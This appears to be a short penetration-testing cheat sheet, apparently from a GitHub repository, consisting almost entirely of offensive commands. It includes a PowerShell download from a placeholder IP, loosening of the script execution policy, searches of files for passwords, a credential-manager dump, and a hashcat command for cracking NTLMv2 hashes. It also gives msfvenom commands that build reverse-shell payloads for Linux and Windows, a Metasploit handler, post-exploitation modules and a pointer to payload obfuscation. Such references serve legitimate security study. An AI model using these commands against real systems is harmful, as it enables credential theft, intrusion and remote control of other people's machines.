Run powershell:
powershell.exe -noexit
Download file with powershell:
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://IP', 'file_name')"
Invoke-WebRequest -Uri $url -OutFile $output
Powershell allow running scripts:
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Credential manager link (also in this github repository as cm.ps1:
.\cm.ps1 -ShoCred -Target 'localhost' -All
Finds:
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si heslo *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt
dir /s *.kdb*
Directory switching when not utf8 encoding:
$Files = Get-ChildItem -Path .\ -Directory | ForEach-Object {$_.FullName }
cd $Files[x]
Start - stop services
PS C:\> Get-Service -Name "iisadmin"
PS C:\> Stop-Service -Name "iisadmin"
PS C:\> Start-Service -Name "iisadmin"
Basic website.
Find executable files:
find / -perm -4000 2>/dev/null
Hashcat:
hashcat -m 5600 -a 0 SMBv2-NTLMv2.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
-m 5600 - type of hash (5600 is NTLMv2)
-a 0 -type of attack (0 means dictionary)
-r rule set for dictionary attack
Generic handler reverse shell:
use exploit/multi/handler
set payload windows/shell/reverse_tcp
Payloads - reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
-f can be skipped!
Postexploration (new)
run post/windows ...
Obfuscating payload link - can be easilly optimized, changed code etc. ...
- Thanks LukaSikic. Code also here as reverse.py.